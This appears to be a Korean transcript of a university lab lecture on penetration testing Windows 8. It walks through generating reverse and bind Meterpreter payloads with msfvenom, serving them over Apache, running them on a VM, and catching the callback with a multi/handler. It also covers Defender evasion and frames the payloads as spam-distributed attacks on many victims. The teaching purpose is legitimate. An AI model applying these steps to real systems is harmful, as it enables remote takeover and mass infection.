자, 오늘은 루트로 들어갈 겁니다. 파일을 좀 만들어야 되니까 계정을 루트로 들어가도록 할게요. 오늘 뭐 파일 되게 파시게 하세요. 자, 봅시다. 오늘은 아주 짧게 끝낼 거예요. 시험은 다음 주 오전 10시에 하도록 하고요. 그동안 여러분들이 실습했던 내용들 다 있죠? 그거 그대로 시험 문제 나옵니다. 그러니까 엠맵의 사용법, 그리고 침투하는 방법, 그 다음에 또 뭐 있지? 침투 후에 부처리 공격하는 방법, 그리고 뭐죠? 넥서스를 사용하는 방법, 뭐 이런 것들. 거기에 대해서 설명하랍니다. 객관식 아니고 주관식으로 한 10문제 정도 이렇게 나올 거다. 자, 오늘은 이제 드디어 윈도우즈 운영체제의 뭐다? 침투 훈련을 할 거다. 그지? 그래서 오늘은 시험 문제 나오는 것부터 얘기할게요. 악성 코드를 제너레이터 할 거다. 교수님, 악성 코드 만드는 법 모르는데요. 이미 칼리 리눅스에는 한 1600개 정도의 악성 코드가 탑재되어 있습니다. 윈도우즈 공격용, 모바일 폰 공격용, 그리고 뭐다? 리눅스 시스템 공격용, 라우터라든지 여러 가지 통신 장비 공격용 악성 코드들이 다 들어 있었어요. 그동안 우리가 리눅스 시스템을 공격을 할 때는 사실은 백도어가 있는 것도 있었지만은 페이로드라는 악성 코드가 자동으로 주입이 되던 거예요. 그래서 어떻다? 실제로 시스템의 권한을 탈취해서 뭐다? 내가 어떤 조작을 할 수 있었는데 윈도우즈는 기본적으로 백도어라는 게 설치가 안 되어 있습니다. 물론 미국 국토안보부에서 설치한 것도 있지만 기본적으로 뭐다? 사용자가 쓸 수 있는 백도어가 없다. 그래서 어떻게 해요? 악성 코드를 그냥 밀고 들어가는 방법으로는 침투를 할 수가 없습니다. 자, 그래서 어떻게 해요? 원격 접속이라는 게 되죠. 윈도우즈도. 그래서 원격 접속에 관련된 취약점을 이용을 해서 기존에 만들어져 있는 악성 코드가 있습니다. 이제 그 악성 코드를 제너레이터 해서 윈도우즈에서 누군가가 그 파일을 실행을 하면 이메일을 누르든지 뭐 이렇게 하게 되면 실행이 될 수 있죠. 그래서 그 파일을 실행을 하게 되면 시스템 권한이 어디로? 칼리 리눅스로 넘어오는 그런 방식을 테스트할 겁니다. 자, 근데 이 악성 코드를 만드는 방식은 두 가지 방식이 있습니다. 시험 문제 나와요. 첫 번째 방식은 바인드 방식의 악성 코드 제작 방법이 있고요. 두 번째 방법은 뭐다? 리버스 방식의 악성 코드 제작 방법이 있습니다. 자, 바인드 방식과 리버스 방식의 악성 코드 제너레이터 방식은 조금 차이가 있어요. 어떤 차이가 있느냐? 자, 바인드 방식으로 악성 코드를 제작을 해서 윈도우즈 시스템에 전송을 해서 윈도우즈에서 실행을 하게 되면 어떤 일이 발생하냐면 해커가 들어오기 전에는 뭐다? 반응을 하지 않도록 되어 있어요. 그러면 해커가 어떻게 해야 돼요? 악성 코드가 감염된 기계를 찾아와야 돼요. 찾아와야 돼요. 그러려면 어떻게 해야 돼요? 지금 상명대학교 안에는 약 한 3,300개의 유선 PC가 있어요. 물론 여러분들 뭐 노트북도 쓰니까 실제로 훨씬 더 많겠죠.
자, 그러면 상명대학교 안에 어떤 특정한 기계에 여러분들이 바인드 방식으로 악성 코드를 감염을 시켰다라면 여러분들이 해커라면은 뭘 뚫고 들어와야 된다? 상명대학교 방화벽을 뚫고 내부로 들어와야 된다. 그래서 바인드 방식의 악성 코드는, 자, 이거 그림을 그려놓을게요. 자, 여기가 공격자예요. 공격자가 스팸 메일이나 또는 뭐 여러 가지 방법들, 인터넷상에서 누군가가 파일을 다운로드 할 수 있는 방법을 통해서 뭐다? 자, PC에다가 뭐 했다? PC에다가 악성 코드를 감염시켰다. 근데 이 악성 코드가 하나는 바인드 방식이 있고 하나는 리버스 방식이 있다. 두 가지밖에 없어요. 자, 바인드 방식으로 악성 코드가 감염이 되어서 파일이 실행이 되면 이 PC는 뭐다? 스탠바이 상태로 있대요. 그래서 어떻게 해요? 공격자가 이 PC를 컨트롤하기 위해서는 뭘 뚫고 들어와야 된다? 방화벽이라는 녀석을 뚫고 들어와야 된다. 이걸 뚫고 들어와야만이 이 PC 안에 있는 내용들을 조작할 수 있다. 그럼 쉽지 않잖아요. 그렇죠? 그래서 요즘은 바인드 방식의 악성 코드를 제작하지는 않습니다. 왜? 방화벽을 뚫을 정도가 되면 뭐죠? 사실은 이 PC 어떻게 해서든 뭐다 시스템 권한을 탈취할 수 있대. 방화벽을 뚫는다는 건 굉장히 쉬운 일이 아니에요. 자, 그래서 뭐다 바인드 방식의 악성 코드 방식은 좋기는 하지만은 요즘 잘 사용하지 않는 방식 중에 하나다. 그러면은 리버스 방식의 악성 코드는 어떤 거냐면, 악성 코드가 실행이 되면 어떻게 해요? 시스템의 제어 권한을 누구한테 주는 거다? 공격자한테 넘겨주는 거다. 자, 방화벽의 작동 원리를 잘 보셔야 되는데, 방화벽은 어떤 게 목적일까요? 외부에서 들어오는 침입을 막는 장치예요. 근데 거의 대부분 기관이 내부에서 외부로 나갈 때는 그렇게 보안에 신경 쓰지 않습니다. 거의 대부분의 방화벽 장비는 외부에서 들어오는 침입을 막기 위해서 뭐다 열일을 하지, 우리 기관 내에서 밖으로 나가는 일들은 뭐다 그렇게 신경을 쓰지 않습니다. 그래서 어떻다? 리버스 방식으로 악성 코드를 만들면 방화벽을 고민하지 않고도 뭐 할 수 있다? 시스템의 권한을 탈취할 수 있다. 자, 그럼 시험 문제가 뭐죠? 장점과 단점을 기술하시라. 그럼 교수님, 장점이 있나요? 바인드 방식에? 있습니다. 그렇죠. 바인드 방식은 방화벽을 뚫어야 되는 단점은 있지만 뭐가 없다? 해커의 IP가 노출되지 않는다. 악성 코드 안에 뭐가 없다? 해커의 IP가 없습니다. 그래서 어떻게 해요? 해커의 IP가 노출되지 않는다. 이제 리버스 방식은 뭐다? 악성 코드가 실행이 되면 뭐 하는 거다? 해커의 PC로 접속이 돼야 되죠. 그러려면 그 악성 코드 안에는 뭐가 들어있다? 해커의 IP가 노출이 됩니다. 물론 이제 보수가 되면 저 IP도 숨기겠죠. 보수가 되면 IP도 숨길 수 있지만 가장 기본적인 뭐다 악성 코드 안을 리버스 해보면, 악성 코드를 분석해 보면은 리버스 방식의 악성 코드는 안에 뭐가 있다? 해커의 IP가 들어가기 때문에 어떻다? 해커의 위치가 노출이 될 수 있다. 장점은 뭐죠? 방화벽을 우회하지 않아도 된다는 장점이 있다. 방화벽은 뭐죠? 바인드 방식은 뭐다? 해커의 IP가 노출이 되진 않지만 뭘 해야 된다? 방화벽을 우회해야 된다.
어떤 게 더 쉽습니까? 라는데 리버스가 더 쉽죠. 방화벽을 우회한다는 것 자체는 굉장히 어려운 일입니다. 상명대학교의 외부에서 상명대학교로 들어올 때는 단 하나의 포트만 열려 있어요. 13389만 열려 있습니다. 그건 뭔데요? 교수님들이 집에서 연구실 접속하려니 접속이 안 돼. 그래서 어떻게 열어달라. 그래서 기본적으로 3389가 열려 있는데 3389를 열면 해커가 들어올 수 있죠. 그래서 교수님 제발 할 일은 연구실에서 하세요. 그러니까 야씨 집이 서울인데 어떻게 가? 그래서 13389가 열려 있더래. 우리 과 학생들도 쓰죠. 우리 과 3학년들도 전부 다 저기 딥러닝 서버 돌린다고 13389를 쓰고 있죠. 여러분들도 기억해놔야 된다. 그래서 외부에서 상명대로 들어올 때는 13389밖에 없기 때문에 그 포트를 제외한 나머지 포트로는 접속이 불가능해요. 근데 상명대학교 내부에서 여러분들 외부로 갈 때는 다 되죠? 그죠? 내부에서 외부로 가는 포트는 하나도 막아놓은 게 없습니다. 그래서 어떻게 해요? 리버스 방식으로 하게 되면 방화벽 유의하지 않는다. 그래서 이게 더 좋다. 더 재미난 거는 뭘까요? 지금 오늘 우리가 윈도우즈 8만 할 겁니다. 10하고 이런 것들은 여러분들이 하세요. 윈도우즈 8에도 뭐가 설치가 되어 있냐면 디펜더라는 게 설치가 되어 있습니다. 윈도우즈 디펜더. 근데 윈도우즈 8에 있는 디펜더는 오늘 우리가 만드는 악성 코드 중에 뭔 탐지한다? 바인드 방식은 탐지하도록 되어 있어요. 그래서 바인드 방식으로 악성 코드를 만들고 윈도우즈 8에서 다운로드 받으면은 악성 코드입니다 라고 찾아내고 자동으로 지워버립니다. 그러나 윈도우즈 8에 있는 뭐죠? 디펜더는 리버스 방식의 악성 코드는 감지 못해요. 그러니까 윈도우즈 8 초창기 버전까지는 바인드 방식의 악성 코드는 검출할 수 있지만 리버스는 검출하지 못합니다. 윈도우즈 7은요 둘 다 검출 못하고 윈도우즈 10이 되면 바인드와 리버스는 검출하도록 되어 있다. 왜? 윈도우즈 10은 이미 쓰고 있는 거잖아요. 윈도우즈 8은 서비스가 종료된 운영체제고. 근데 그럼에도 불구하고 윈도우즈 10에 방화벽 디펜더를 끄면은 돌아갑니까? 둘 다 돌아가요. 디펜더를 끄면은 윈도우즈 안에서도 악성 코드가 돌아갑니다. 물론 11도 돌아가요. 11도 돌아갑니다. 자, 그렇다. 그래서 오늘 악성 코드를 하나 만들어서 윈도우즈 8에서 설치를 하고 윈도우즈 8에서 파일이 작동이 되면 뭐 하는 거다? 시스템의 제어 권한을 칼리 리눅스에서 받아서 오늘은 후 처리하는 방법까지 강의를 진행하고요. 셀터라는 툴이 있습니다. 언디텍티블 스텔스 모드로 파일을 만들어주는 악성 코드를 만들어주는 툴이 있는데 그 툴은 사용법만 설명을 하고 실습은 여러분들이 하시면 돼요. 시험에 나옵니까? 예, 나옵니다. 시험에 나옵니다. 그래서 한번 쭉 보자. 80페이지가 있긴 한데요. 실제로 여러분들이 해야 되는 명령어는 한 2개인가 3개밖에 없어요. 그 나머지는 다 썰입니다. 썰. 자, 그래서 오늘은 윈도우즈 8, 윈도우즈 10 운영체제의 보안 점검을 한번 하는데 뭘 만들었을 거다? 악성 코드를 만들었을 거다. 자, 그래서 오늘은 메타 프레임워크에서 시스템을 컨트롤할 거고요. MSF 베놈이라는 툴을 쓸 거다. MSF 베놈이라는 툴을 이용을 해서 악성 코드를 제작하고 그리고 미터 프린터를 이용을 해서 윈도우즈 8, 10에 있는 정보를 수집을 하고 그런 과정들을 할 거다. 자, 그래서 오늘 실습 내용도 문서화해서 제출하시고 미터 프린터를 이용해서 해킹한 PC의 내용을 확인할 수 있는 모든 방법을 찾아서 문서화해라. 왜? 교수님이 다 못해요. 다 못한다. 그래서 우리가 리눅스 시스템을 할 때는 여러분들이 잘 모르니까 기본적으로 뚫고 들어간 것만 썼지만 윈도우즈 8은 8과 10은 미터 프린터를 이용하는 정보 수집 방법에 대해서 한번 다 테스팅 해봐라. 그 다음에 윈도우즈 10, 11 운영체제를 디펜더를 끄지 않고 침투하는 방법을 찾아서 문서로 만들어라. 이렇게 하면은 가산점 5점을 줄 거다. 훅스 툴이라는 게 있는 것 같아요. 작년에도 학생이 뭘 했나니까 스크립트를 제작해주는 툴이 있더라고요. 그 툴을 가지고 윈도우즈 10, 11을 침투하는 것들 한번 찾아본 것 같은데 여러분들도 한번 찾아보셔라. 자, 넘어가겠습니다.
자, 그동안 뭐 설명이 별로 없었죠. 메타스플로이 프레임워크는 다양한 지학점 분석에 관련된 모든 메타데이터를 관리하는 프레임워크다. 해킹이나 보안 지학점 분석에 많이 쓰이고 실제 보안 지학점 테스트를 위해서 HDW어 오펜시브 시큐리티 안에서 만들잖아요. 기본적으로 설치가 되어 있다. 그리고 칼리 리눅스 안에는 뭐도 있다? MSF 베놈이라는 게 설치되어 있다. 예전에는 페이로드와 엔코더가 분리되어 있었는데 2015년, 지금으로 10년 전이죠. 10년 전에 통합을 해서 MSF 베놈을 운영했다. 그리고 미터프리트는 목표 시스템, 그죠? 해킹한 시스템에 정보를 출력하고 프로세서를 조정을 하고 화면을 캡처하고 여러분들이 해킹한 시스템에 마이크를 켜고 웹캠을 켜고 이런 기능들을 다 지원해 줍니다. 그동안 메타스플로이 터블에는 이런 기능이 없어서 안 썼는데 오늘은 윈도우즈 8 쓸 거잖아요. 그래서 이 기능들을 캡처하고 정보를 수집하는 방법들을 몇 가지는 보여줘요. 스크린 캡처, 스크린샷, 그리고 파일을 업로드, 파일을 다운로드 뭐 이런 것들은 몇 가지 알려주겠지만 나머지는 여러분들이 직접 작업을 하시기 바랍니다. 자, 이건 뭐 지난번에 했었죠. 근데 시험 문제 다뤄요. 그래서 MSF 콘솔이라는 폴더 안에는 기본적으로 6가지의 모듈을 가지고 있다. 익스플로잇은 침투에 관련된 방법, 페이로드는 악성 코드에 관련된 방법, 그리고 엔코더는 악성 코드를 만들고 난 다음에 후처리하는 방법들, 그리고 뭐 보조 도구, 그리고 후처리에 관련된 포스트 방식, 2차 공격에 관련된 방법들을 이렇게 모아놨다는. 요 각각에 대해서 뭐다 시험 문제 나옵니다. 그래서 정리를 한번 해보셔라. 자, 그래서 뭐 플랫폼 서비스 이렇게 코드 이런 식으로 구조가 되어 있다. 뭐 이렇게 살펴보시면 되고요. 뭐 보조 도구에도 이런 식으로 들어가 있고 나머지도 있다. 자, MSF 콘솔을 사용하는 방법을 요약해 놓은 겁니다. 그지? 자, MSF 콘솔을 실행을 하고 서치해서 뭐 하는 거다? 공격 방법을 찾고 그 녀석을 사용하겠다 하고 인포나 쇼 옵션즈를 통해서 사용법을 보고 셋하고 런 또는 익스플로잇을 하면 인터프리터로 들어간다. 그 얘기입니다. 자, 그래서 그 안에 폴더들은 이렇게 됐다 이거죠. 자, 오늘은 이걸 쓸 겁니다. MSF 베놈 -LP 하면 교수님이 이걸 캡처할 때는 각 프레임워크에 한 569개, 한 3, 4년 전에 캡처해 놓은 건데 지금 몇 개나 있나 한번 살펴봅시다. LP죠. 굉장히 많이 나올 겁니다. 보자. 와, 몇 년 사이에 굉장히 올라왔죠? 지금 몇 개? 1680개의 페이로드를 만들 수 있다. 자, 잘 봐라. 교수님도 다 안 써봤어요. 근데 안에 쭉 보니까 자, 이걸 잘 봐요. 바인드 TCP 방식으로 AIX라는 운영체제입니다. 맨 앞에는 운영체제예요. 그러면 뭐다? 바인드 TCP 방식으로 악성 코드를 만들어 줍니다 라는 거예요. 요거는 뭐다? 뭐 악성 코드인데 바인드 포트죠. 그 다음에 밑에 보니까 뭐라고 돼 있어요? 리버스 TCP라고 돼 있죠. 거의 대부분의 악성 코드가 두 종류로 나와 있을 거다. 바인드 방식, 리버스 방식. 프로토콜이 HTTP도 있을 수도 있고 TCP도 있을 수 있고 여러 가지가 있을 수 있는데 기본적으로 아래쪽에 있는 걸 보면 그렇다. 와, 그럼 교수님 밑에 보니까 안드로이드 있네요. 실제 현재 쓰고 있는 안드로이드는 안 돼요.
그럼 안드로이드용 악성 코드도 만들어집니까? 예, 만들어져요. 밑에 보니까 애플의 iOS 이것도 구형 버전만 됩니다. 신형은 넣어놓을 수 없겠죠. 그리고 BSD는 옛날에 사용하던 유닉스 머신이고요. 그리고 리눅스의 커맨드 라인에서 관련해서 쓸 수 있는 건데 전부 다 리버스죠. 바인드보다는 리버스가 훨씬 더 많죠. 그 말은 뭐다? 바인드 방식은 방화벽을 뚫어야 되기 때문에 요즘 잘 만들지 않는. 와, 리눅스가 굉장히 많네요. 그렇죠? 리눅스가 엄청 많다. 쭉 내려가다 보면 1600개니까 다 볼 수는 없고요. 와, 리눅스가 대박이네. 리눅스가 몇백 개가 넘죠. 쭉쭉쭉 내려가니까 유닉스도 있고 윈도우즈는 W니까 조금 더 내려가야겠죠. 자, 그래서 이렇게 쭉 내려가 보면 이제 윈도우즈 나오죠. 윈도우즈 파워셀의 마인드 방식의 악성 코드 뭐 이래서 악성 코드가 우수로 많다. 근데 안에 살펴보면 거의 대부분 뭐예요? 리버스 바인드, 리버스 바인드, 뭐 리버스 바인드, 리버스 바인드 이런 방식이 있거든요. 내려가 봅시다. 오늘 쓸 거가 찾아야 되는데 링스, PHP, 윈도우즈, DLL 인젝션하는 악성 코드들. 그리고 뭘 쓸 거냐면요. 오늘 쓸 게 요거 두 가지입니다. 요거 쓸 거다. 윈도우즈 시스템을 공격하는 바인드 방식의 뭐다? TCP를 사용하는 악성 코드. 요 악성 코드 제너레이터 방법하고 그 다음에 밑에 보면 리버스 TCP라는 게 있을 거예요. 좀 내려가 보면 여기 있네. 요 두 개를 쓸 겁니다. 자, 편리상. 자, 요거 나중에 타입 붙여야 되니까 편리상. 카피 셀렉션 메모장 하나 열게요. 시프트 인서트. 요거 하나. 시프트 인서트. 요 두 가지를 쓸 겁니다. 윈도우즈를 미터 프리터 방식으로 침투하는 리버스 방식의 TCP의 악성 코드, 그리고 바인드 방식의 뭐다? TCP를 사용하는 악성 코드, 이렇게 두 가지를 만들어 보거든요. 그러고 가봅시다. 자, 그래서 어떻다? 칼리 리눅스에서 사용 가능한, 제작 가능한 악성 코드는 MSF 베놈 -L 키라는 옵션을 이용하면 나온다. 교수님 너무 많이 나오는데요. 그래서 어떻게 해요? 이렇게 봐봐 뒤에 윈도우즈만 보여줘. 근데 윈도우즈만 보여달래도 몇백 개가 나올 겁니다. 몇백 개가 나올 거예요. 필터링해서 나올 수 있다. 자, 그래서 오늘 뭘 쓸 거다? 요겁니다. 인젝터 더 미터 프리터 서버 DLL을 밀어넣는 방식인데요. 그죠? 커넥트, 요걸 잘 봐야 돼요. back to the attack. 연결되는데요. back to the attack. 어태커로 돌아오게 만드는 악성 코드다. 바인드는 뭐라고 설명해 놨을까? 바인드. 잠시 내려가고 바인드는 뭐라고 설명해 놨을까요? 이렇게 해놨죠. 윈도우즈가 뭐한다? Listen for connection. 기다리게 하겠다. 연결을 기다리게 악성 코드를 만들겠다. 그러면 차이점은 뭔데요? 리버스 방식은 감염되는 순간 어떻게 해요? 감염되는 순간 해커한테 제어 권한이 넘어오고요. 바인드 방식은 감염이 되어도 아무런 역할을 하지 않습니다. 어떻게 해요? 해커가 들어올 때까지 뭐다? 리슨하고 있다. 기다리고 있는 상황입니다. 그러면 해커가 어떻게 해야 돼요? 방화벽이나 보안 장비들을 뚫고 들어와야 된다. 이런 문제들 가지고. 자, 여기 있네요. Listen for connection. 그죠? 괜히 같네. 자, 그러면 잘 봐. 바인드 방식의 악성 코드는 뭐가 없어도 돼요? 공격자의 IP가 없어도 되죠? 맞나? 왜? 내가 나중에 가면 되잖아. 근데 리버스 방식에는 뭐가 필요해요? IP가 필요하죠? 그러면 당연히 악성 코드를 만들 때 그 악성 코드에 뭘 넣어야 돼요? 해커의 IP를 넣어놔야 되죠. 그러려면 뭐 해야 돼요? 해커의 IP를 확인하려면 뭐 하면 되노? IF 컴피그를 통해서 뭐다? 칼리 리눅스의 IP가 있어야 되겠죠. 맞나? 그지? 그래서 저걸 확인해 놓고요. 자, 그 다음에 만드는 방법입니다. 간단해요.
잘 봐라. MSF 베놈 -P 페이로드를 사용하겠다 이겁니다. 페이로드가 악성 코드죠. 어떤 악성 코드? 윈도우즈 미터 프리터 리버스 TCP 맞아요? 그리고 여기 뭐라고 해놨노? L 호스트 192.168.78.138 이건 누구 거예요? 칼리죠? 왜 악성 코드가 감염이 되면 어떻게 해요? 자동으로 일로 와야 되니까 여기가 어디? 칼리 IP를 써야겠죠. 그러고 난 다음에 뭐다? 파일 포맷을 뭘로? exe로 만들어져라. 오브젝트 네임 스몰 o입니다. 오브젝트 네임을 reverse.exe로 하겠다. 자, 여기까지 한번 만들어 봅시다. 여기까지는 같이 합시다. 자, 잘 봐라. 항상 뭐고? 항상 칼리 리눅스 쓸 때 pwd 교수님 지금 어디에 들어와 있노? 루트 폴더에 만듭니다. 그럼 악성 코드가 어디 제너레이트 될까요? 루트 폴더 안에 제너돼요. 여러분들이 칼리로 들어오면 어떻게 해요? 칼리 홈 폴더로 갑니다. 그지? 홈에 칼리로 가잖아. 자, MSF 베놈 -P 페이로드입니다. 어떤 거? 윈도우즈 미터 프리터 뭐 만들 거다? 리버스 TCP L 호스트 큰일 났네. 하나 더 해야 되네. IP 안 들고 왔네요. 아, 예. 136128이네요. 카피 셀렉션 시프트 인서트 -FEXE로 만들어줘. -O 이름은 reverse EXE로 만들어줘. 그럼 만들어줍니다. 그러면 뭐라고 나오노? saved as reverse.exe 맞아요? 그럼 만들어졌나 확인하려면 ls 누르면 나오죠? reverse.exe가 만들어져. 그럼 얘가 뭔데요? 악성 코드입니다. 아무런 화면에 뜨는 것도 없고 악성 코드 기능 덩어리 하나 만들어진 거예요. 이거 V3로 잡으면 잡힙니다. 윈도우즈로 가져오면 안 돼. 자, 그럼 두 개 만들어야 되죠? 뭘 만들어라? 마인드 방식 만들어라. 마인드도 뭐가 없어도 돼요? 얘가 없어도 되죠? 그리고 이름을 뭘로? 마인드 EXE로 하겠다. 그러면 뭐다? 326바이트 페이로드고 파이널 사이즈 하니까 7168로 만들었어요. ls-l 그러면 bind.exe와 뭐다? reverse.exe 두 개가 만들어졌죠. 실전이야. 진짜 악성 코드입니다. 자, 그러면 시험 문제 또 이렇게 나와요. 얘네 둘이를 이제 어떻게 해야 돼요? 스팸 메일을 통해서 무차별하게 배포해가지고 어떻게 해요? 이제 잡아내야 되죠. 근데 얘는 문제가 뭐고 상대방의 뭘 모르면 못해요. IP를 모르면 공격을 할 수가 없다. 그러니까 이 방법이 훨씬 좋죠. 맞나? 이 방법이 훨씬 좋은 거다. 자, 그런데 자, 이 두 녀석을 윈도우즈 8으로 배달해야 되는데 배달할 수 있습니까? 근데 못합니다. 왜? 크롬에서 악성 코드로 잡아요. 그래서 크롬에서 못 잡더라도 네이버 메일 서버나 지메일 서버가 또 잡아요. 그래서 현존하는 방법으로는 못 보낸다. 그럼 어떻게 해요? 윈도우즈 8의 디펜더는 바인드를 잡지만 리버스는 못 잡는다고 그랬죠. 그러면은 이거 어떻게 해요? 그래서 우리가 이거 만들어 놨지. mv 모든 것점 exe를 어디로 var ww html 테스트 이거 기억납니까? mv가 뭘까? move string.exe가 뭐죠? 현재 폴더의 앞에 이름은 상관없고 뒤에 exe인 녀석을 어디로? var 폴더 ww html 테스트로 보내라. 맞아요? 자, 그러면 갔나? 가보면 되죠. cd var ww 갔으니까 이런 메시지 안 나옵니다. html 테스트
ls-l. 그러면 test.txt하고 bind reverse가 올라가 있죠. 맞나? 자, servi 서비스 apache-he2 sda tus 아이고 러닝 하고 있네. 그죠? 아파치 2가 돌고 있죠. 칼리 리눅스도 웹 서버니까 러닝 되고 있네. 컨트롤 C. 자, if config 그러면 뭐예요? 요거죠. copy select. 자, 윈도우즈 8 올려볼게요. 윈도우즈 8에 뭐다? Shift insert. 자, 여기 잘 봐라. 보안및 보안성 쓸까요? 아니요. 건장 설정 사용 안 함이라 하세요. 일단은 확인. 보안을 끄세요. 보안을 켜놔도 상관이 없는데, 그리고 여기에 test 테스트 폴더에 들어오면 바인드 리버스 두 개가 있죠. 맞아요? 그러면은 요 놈을 다운로드 받아서 딱딱 누르면은 어떻게 해요? 악성 코드가 돌아갑니다. 자, 봐라. 그럼 교수님 이거 다운로드 어떻게 받아요? 리버스 오른쪽 마우스 누르고 다른 이름으로 대상 저장. 어디? 다운로드 폴더죠? 저장. 그지? 그 다음에 리버스 방식 다른 이름으로 대상 저장. 자, 뭐라고 뜨노? 몰웨어 검색됨. 윈도우즈 디펜더가 뭐 했다? 트로이안 윈32 S워드 A라나? S워드 A. 트로이 목마 프로그램이고 있다. 그래서 어떻게 해요? 이놈 다운로드 못한다 이겁니다. 그래서 여러분들 다운로드 폴더에 가보면 뭐밖에 없노? 리버스밖에 다운로드가 안 돼요. 확장자 어떻게 보지? 확장자는 안 보네. 하도 오래돼서 윈도우즈 보기. 여기 메뉴가 있어야 되는데 안 보이네. 우선 뭐 없어도 상관없습니다. 그래서 어떻게 해요? 바인드 방식은 다운로드가 안 되고요. 리버스 방식밖에 안 된다. 윈도우즈. 그럼 교수님 바인드 방식도 내가 테스트하고 싶은데요. 그러면 뭘 깔아야 돼요? 윈도우즈 7을 깔든지 윈도우즈 8에도 디펜더를 끄는 기능이 있어요. 그걸 끄면은 바인드는 다운로드 돼요. 근데 지금 뭐 굳이 바인드는 테스트 안 해도 상관없습니다. 왜? 요즘 안 쓰는 거니까. 그럼 이제 리버스가 왔죠? 잘 봐. 땅땅. 잠깐만, 다른 이름으로 저장이구나. 취소. 자, 어디 갔노? 탐색 올리고. 그러니까 이게 떠야 되는데 왜 안 떴지? 했지? 그죠? 보기에 가서 확장면. 자, 잘 봐라. 땅땅 실행하면 경고가 뜹니다. 그래도 실행하겠습니까? 예, 눌러요. 그러면 여기 마우스가 뱅글뱅글 돌다 끝나버려. 아무 일도 안 나죠. 왜? 악성 코드 덩어리잖아. 그럼 지금 뭐가 된 거야? 이 컴퓨터에 악성 코드가 돌고 있는 거야. 근데 교수님 왜 칼리 리눅스에서는 아무 일도 하지 않죠? 칼리 리눅스에는 콘솔이 없잖아. 감염돼서 오면은 뭘 받아요? 커넥션에 연결할 수 있는 인터프리터가 필요하죠? MSF 콘솔을 실행 안 했잖아. 그래서 뭐다? 안 돌아가고 있대. 자, 그럼 이제 뭘 해야 돼요? 콘솔을 열어주면 됩니다. 자, 그래서 리버스 방식 하나 만들고 바인드 방식 하나 만들고 다 있습니다. 방금 교수님이 한 거 mv 모든 것.exe를 어디 var w html 테스트 폴더로 옮겨라. 그래서 테스트 폴더에 가보면 바인드 리버스 텍스트가 들어가 있죠. 자, 그래서 윈도우즈 8이죠. 8에서 뭐다? IP 누르고 테스트 폴더 들어오니까 바인드 리버스를 받고 이제 저 두 개 지금 다운로드 된 상태죠. 자, 그러면은 저 두 녀석이 뭐 한다? 작동이 되면 낚시해야 될 거 아니에요. 낚시하고 건축을 해야 되니까 인터프리터가 필요하죠. 자, 봐라. 뭐야노? 자, 봐라. MSF 콘솔 요 녀석이 뭐죠? 조작할 수 있는 프레임워크이죠. 돌려. 그래서 들어왔어요. 들어와서 뭐하노? 자, 여기 어디 갔노? use 이렇게 들어가야 돼요. 여기 잘 봐라. use exploit multi handler. 그리고 페이로드는 리버스 방식 먼저 하나 걸어볼게요.
그리고 여기에 뭐다? 칼리의 IP, 칼리의 포트를 444. 그 다음에 뭐죠? 요거 잘 봐라. set exit on session false인데 요렇게 하면 에러 날 수 있을 거다. 최신 버전에는 S를 붙여야 될 거예요. 내가 필기를 했다. set exit on sessions false로 갈 거예요. 요즘 거는. 교수님이 2년 전에 이거 캡처했을 때는 요렇게 들어갔는데 요즘은 S를 안 붙이면 에러 나는데. 요게 뭐냐면 세션을 잡으면은 죽이지 마라 이 소리예요. 안 해도 되는데 요걸 해놓으면은 세션을 잘 안 죽입니다. 그러고 교수님 그동안 우리가 리눅스를 침투할 때는 익스플로잇만 했는데 교수님 -J, -Z가 있네요. 요거는 뭔데요? 백그라운드 모드에서 기다려라. 왜? reverse.exe를 언제 실행할지 모르잖아. 내가 스팸 메일을 10만 개를 보내서 그럼 사람들이 거의 안 누를 거 아니야. 대부분 스팸을 지우잖아요. 근데 거기서 꼭 1, 2% 사람은 눌러본단 말이에요. 그럼 그 사람이 언제 누르는지 모르죠. 그래서 어떻게 해요? 자, exploit은 공격하라는 거지만 뭐다? 밑에 보세요. exploit running as background job 빵이라고 된다. 그 말은 뭐죠? -J, -Z 옵션이 뭐다? 자, 리버스 방식의 낚시를 할 건데 언제 올지 모르니 백그라운드로 기다리고 있어. 그래서 뭐예요? 이 사람이 들어오면 뭐하라? 커넥션을 잡고 유지해. 근데 중요한 거는 내가 스팸 메일을 던졌으면 PC1이 있을 거고 PC2가 있을 거고 PC3이 있을 거 아니에요. 다 잡아라 이 소리예요? 예, 다 잡아라 이겁니다. 그렇잖아. 내가 스팸 메일 10만 개 던졌으면 100명이 눌렀다 하면 100명의 커넥션이 생기겠죠. 맞아요? 그걸 어떻게 해요? 다 잡아줘라. 그럼 혹시 교수님 100대가 잡히면 세션즈 -L 한 100대가 쫙 올라와요. 지금은 한 대니까 하나밖에 안 올라오겠지만 내가 뭐야 해커다. 상대방 국가에 뭐다 사이버전을 한다. 그럼 상대방 국가에 있는 사람들의 이메일을 할 수 있죠. 우리 이메일 OS, INT 정보를 통해서 게더링 할 수 있잖아. 무차별로 던져서 한 5천만 개 날려버렸다고. 그 중에서 몇 명은 누를 거 아니야. 그러면은 어떻다? 칼리 리눅스에서 쫙 잡아서 처리할 수 있다. 자, 봅시다. 그러면은 낚시하는 법 알려드릴게요. 자, MSF 콘솔이죠. 됐다. use exploit. 사실 이것도 서치해도 됩니다. 근데 이거는 누릅시다. 멀티 핸들러 됐죠? set payload 윈도우즈 리터 리버스 TCP. 야, 잘못 눌렀네. 아이고 괜찮아. 뭘 잘못 눌렀냐 뭐지? set payload S 뺐네. 아이 괜찮아. SE 언더바 TCP 안 들어오네. 윈도우즈 리터 리버스 맞는데? set payload 윈도우즈 리터 리버스 언더바 TCP. 어? 왜 안 맞지? 하나 더 늘었네. 이제 들어왔네. 자, 들어오고 난 다음에 IP 지정해 줘야 돼요. 로컬 호스트 IP가 아까 몇 번이었지? IP가 이거죠? set L host shift insert set LPORT 4444를 써요. set
